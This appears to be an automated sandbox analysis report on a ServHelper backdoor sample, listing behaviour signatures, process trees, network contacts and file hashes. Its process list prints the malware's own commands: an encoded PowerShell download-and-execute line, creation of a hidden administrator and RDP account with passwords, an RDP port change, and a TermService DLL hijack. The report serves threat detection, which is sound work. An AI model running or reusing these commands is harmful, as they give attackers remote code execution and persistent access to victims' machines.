Malware Analysis Report

2024-10-19 04:37

Sample ID 210924-xryqjahfh7
Target 5367615a3d3f95eeab592a53716ed3bb.exe
SHA256 af7e2ecb8e84ad61c276347e0e766e21a043f2119dacb19ae538bddf5d0452f0
Tags
servhelper backdoor discovery exploit persistence trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

af7e2ecb8e84ad61c276347e0e766e21a043f2119dacb19ae538bddf5d0452f0

Threat Level: Known bad

The file 5367615a3d3f95eeab592a53716ed3bb.exe was found to be: Known bad.

Malicious Activity Summary

servhelper backdoor discovery exploit persistence trojan upx

ServHelper

Grants admin privileges

Blocklisted process makes network request

UPX packed file

Possible privilege escalation attempt

Sets DLL path for service in the registry

Modifies RDP port number used by Windows

Modifies file permissions

Loads dropped DLL

Drops file in System32 directory

Drops file in Windows directory

Drops file in Program Files directory

Modifies data under HKEY_USERS

Script User-Agent

Suspicious use of AdjustPrivilegeToken

Runs net.exe

Modifies registry key

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: LoadsDriver

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2021-09-24 19:05

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2021-09-24 19:05

Reported

2021-09-24 19:10

Platform

win7-en-20210920

Max time kernel

138s

Max time network

39s

Command Line

"C:\Users\Admin\AppData\Local\Temp\5367615a3d3f95eeab592a53716ed3bb.exe"

Signatures

ServHelper

trojan backdoor servhelper

Grants admin privileges

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies RDP port number used by Windows

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Sets DLL path for service in the registry

persistence

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\rfxvmt.dll C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\branding\mediasrv.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\wupsvc.jpg C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\Basebrd C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\ShellBrd C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\mediasvc.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\wupsvc.jpg C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\mediasvc.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\mediasrv.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VRQGBH1KYAJHSYPWW58T.temp C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\Wbem\WMIC.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\Wbem\WMIC.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = a0e0008677b1d701 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\system32\reg.exe N/A

Runs net.exe

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\icacls.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1756 wrote to memory of 952 N/A C:\Users\Admin\AppData\Local\Temp\5367615a3d3f95eeab592a53716ed3bb.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1756 wrote to memory of 952 N/A C:\Users\Admin\AppData\Local\Temp\5367615a3d3f95eeab592a53716ed3bb.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1756 wrote to memory of 952 N/A C:\Users\Admin\AppData\Local\Temp\5367615a3d3f95eeab592a53716ed3bb.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 952 wrote to memory of 856 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
PID 952 wrote to memory of 856 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
PID 952 wrote to memory of 856 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
PID 856 wrote to memory of 540 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 856 wrote to memory of 540 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 856 wrote to memory of 540 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 952 wrote to memory of 1808 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 952 wrote to memory of 1808 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 952 wrote to memory of 1808 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 952 wrote to memory of 1508 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 952 wrote to memory of 1508 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 952 wrote to memory of 1508 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 952 wrote to memory of 1960 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 952 wrote to memory of 1960 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 952 wrote to memory of 1960 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 952 wrote to memory of 1564 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\takeown.exe
PID 952 wrote to memory of 1564 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\takeown.exe
PID 952 wrote to memory of 1564 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\takeown.exe
PID 952 wrote to memory of 1560 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 952 wrote to memory of 1560 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 952 wrote to memory of 1560 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 952 wrote to memory of 856 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 952 wrote to memory of 856 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 952 wrote to memory of 856 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 952 wrote to memory of 1856 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 952 wrote to memory of 1856 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 952 wrote to memory of 1856 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 952 wrote to memory of 612 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 952 wrote to memory of 612 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 952 wrote to memory of 612 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 952 wrote to memory of 1608 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 952 wrote to memory of 1608 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 952 wrote to memory of 1608 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 952 wrote to memory of 1980 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 952 wrote to memory of 1980 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 952 wrote to memory of 1980 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 952 wrote to memory of 1088 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 952 wrote to memory of 1088 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 952 wrote to memory of 1088 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 952 wrote to memory of 392 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 952 wrote to memory of 392 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 952 wrote to memory of 392 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 952 wrote to memory of 812 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 952 wrote to memory of 812 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 952 wrote to memory of 812 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 952 wrote to memory of 1820 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 952 wrote to memory of 1820 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 952 wrote to memory of 1820 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 952 wrote to memory of 1400 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\net.exe
PID 952 wrote to memory of 1400 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\net.exe
PID 952 wrote to memory of 1400 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\net.exe
PID 1400 wrote to memory of 732 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1400 wrote to memory of 732 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1400 wrote to memory of 732 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 952 wrote to memory of 1636 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 952 wrote to memory of 1636 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 952 wrote to memory of 1636 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 1636 wrote to memory of 556 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1636 wrote to memory of 556 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1636 wrote to memory of 556 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 556 wrote to memory of 1556 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe

Processes

C:\Users\Admin\AppData\Local\Temp\5367615a3d3f95eeab592a53716ed3bb.exe

"C:\Users\Admin\AppData\Local\Temp\5367615a3d3f95eeab592a53716ed3bb.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\kc8kvr8p.cmdline"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESEB87.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCEB86.tmp"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile

C:\Windows\system32\takeown.exe

"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f

C:\Windows\system32\net.exe

"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr

C:\Windows\system32\cmd.exe

cmd /c net start rdpdr

C:\Windows\system32\net.exe

net start rdpdr

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 start rdpdr

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService

C:\Windows\system32\cmd.exe

cmd /c net start TermService

C:\Windows\system32\net.exe

net start TermService

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 start TermService

C:\Windows\System32\cmd.exe

cmd /C net.exe user wgautilacc Ghar4f5 /del

C:\Windows\system32\net.exe

net.exe user wgautilacc Ghar4f5 /del

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user wgautilacc Ghar4f5 /del

C:\Windows\System32\cmd.exe

cmd /C net.exe user wgautilacc OLe9MZ8B /add

C:\Windows\system32\net.exe

net.exe user wgautilacc OLe9MZ8B /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user wgautilacc OLe9MZ8B /add

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Remote Desktop Users" JZCKHXIN$ /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Remote Desktop Users" JZCKHXIN$ /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" JZCKHXIN$ /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Administrators" wgautilacc /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe user wgautilacc OLe9MZ8B

C:\Windows\system32\net.exe

net.exe user wgautilacc OLe9MZ8B

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user wgautilacc OLe9MZ8B

C:\Windows\System32\cmd.exe

cmd.exe /C wmic path win32_VideoController get name

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\System32\cmd.exe

cmd.exe /C wmic CPU get NAME

C:\Windows\System32\Wbem\WMIC.exe

wmic CPU get NAME

C:\Windows\System32\cmd.exe

cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\system32\cmd.exe

cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f

Network

Country Destination Domain Proto
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 asgyyya6ychcha.xyz udp

Files

C:\Users\Admin\AppData\Local\Temp\ready.ps1

MD5 28d9755addec05c0b24cca50dfe3a92b
SHA1 7d3156f11c7a7fb60d29809caf93101de2681aa3
SHA256 abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9
SHA512 891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42

\??\c:\Users\Admin\AppData\Local\Temp\kc8kvr8p.cmdline

MD5 37d6e0a043f15f4b8cea2b3f476f8034
SHA1 e66c4cc52abce51619d85d5e55f94d66330cbd1f
SHA256 d54d9ab4d61a4bb439c81b568d61a7089121b8880aff53bbbb1b23c319794ef8
SHA512 8e923dda15a7c98b6aff96ce65cb1c912eb8ae03e1059647c8d7334bc90e6a3b7980b48a467b148f00c158bf5dee5b2cb6355a8c18d48c3e1e83d5c756d94323

\??\c:\Users\Admin\AppData\Local\Temp\kc8kvr8p.0.cs

MD5 9f8ab7eb0ab21443a2fe06dab341510e
SHA1 2b88b3116a79e48bab7114e18c9b9674e8a52165
SHA256 e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9
SHA512 53f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b

\??\c:\Users\Admin\AppData\Local\Temp\CSCEB86.tmp

MD5 26dec704e8c5158fafde77c6a5fa9f21
SHA1 fb5a976d97336e074e7117a9d1cf2fbe09f555da
SHA256 b8fa5a80fa261e3ba83972adcff6823925280cd046817c47a49a09662e5ac685
SHA512 02b6dff4d11c79f42304d637dd1bab0c94798f5361190444c8163969d1b780de570dce5357a8ec64b17a3bc766e3d03fd52e6b8c9709c203b70d52a982598f93

C:\Users\Admin\AppData\Local\Temp\RESEB87.tmp

MD5 e2e1064d59e740f85c31ae1fa71225f4
SHA1 ea173ef135dfd7285a88e56169370f8b78eb11a0
SHA256 c02e840125d279f892a1375514621bdc6c50d388bc1e65987feb0519177f5a07
SHA512 0f2e2e189820a6ffeb11f703ecf0bfa440c7831f0efb3eb182983b6818198ae162196fdc33cebc3c0bf6c8f3b44248c0fbe35873bb35b441d81e518cb2a05567

C:\Users\Admin\AppData\Local\Temp\kc8kvr8p.dll

MD5 eaa955de0a4cb151ebdb9fb472e1833c
SHA1 4ed864910c9886b661096523e6abb91f5064a803
SHA256 e67721bc91c776035fb0ced875d9c94a16b47d4d2d0d3d57aec203710f079aba
SHA512 af953a7c5aa0e6c1f9081e8f8ef586d064141cb0b2d2d739d4c73168e7a509a983af4b7aa06c933f74d3071a68b0b14a7046d3da204d3f912466332ed2a67bd4

C:\Users\Admin\AppData\Local\Temp\kc8kvr8p.pdb

MD5 a693d8eb536e69436a6d016c5ae21538
SHA1 6c49b9c08763c975dc6c815ce1e629a86b33dc03
SHA256 d695e4ebb2f1db68776840f0321feb6122cad45f59b6be5a1ae65df816142cfd
SHA512 ec3375bdffbcb839e716cf0bd790654db6391f11fff1ff1a405449ee9a5477f12bb613c87592b02e9408af39fb61f9f0e4d30578ce2cbeffba4949eab5c66acb

C:\Users\Admin\AppData\Local\Temp\get-dnsprovider.PS1

MD5 f784c76a5f451d89ecd31dc71a8c26cb
SHA1 81b9f4163f834ea3cf133e2be9b8b81279e41c6b
SHA256 8d77e8f87f57c3cc6c5b19ea782763c6a4c3c18ee750357c050543d913e6ac9f
SHA512 5b8fd465141921c4791739fe5186b615594ae47e16c568fe6a640cb67c21aa25b0e1b5910c3eb56cf3a23ce4c6d251664e132a3007956ed3453dce3d1f713981

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 bb5af8bc520a0de48105fc923b6a1d84
SHA1 0809d53f50f67e47933b5075c45d95228fdf828c
SHA256 5fc188ee52b3efa71cd4385e987ce5ffd62b4e0b0e6ab3e389c2e7bc1d9a5ab3
SHA512 fb02e2d24d52b48487426556700c74cf4782aac50b01c8316733e82f9450c6cc0fd722f59e958fa4ac992d05a332722d52319628242949386eb59f7ee544984a

C:\Windows\system32\rfxvmt.dll

MD5 dc39d23e4c0e681fad7a3e1342a2843c
SHA1 58fd7d50c2dca464a128f5e0435d6f0515e62073
SHA256 6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9
SHA512 5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

\Windows\Branding\mediasrv.png

MD5 02de1d05ec7c49607d0469e7731760c6
SHA1 39f0cddc616ab7ccfd0030f9aa257d6603373fb6
SHA256 dcb3e99447dd9c7093c425de2dc13d18342299d6b3876542c8b18542b80ec9eb
SHA512 a33b3da342c96816477347e0dfb6a54b2202990370260aa7fb3de6774c6868a9abef8ec1c794115d927432346153663a600142ca86701adaf1cde2b28f749f82

\Windows\Branding\mediasvc.png

MD5 a82cc23d45b8e1de9897fa40dbfebecb
SHA1 16590d3f0a035e0c01a9959593dd35b5d417a18e
SHA256 300f336a781a00987d35d4db230a14f96d3566ad324d8a5f9b0193095ef3d821
SHA512 b644dc69e2937ce23dd0e49f19bf1541f3e72fc9d1ff1a27d9ec009ad908fc19d8470c11dfe49a305cc9db278d684c31553107f8f4808a157e6c2a3873f5025a

\??\PIPE\samr

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
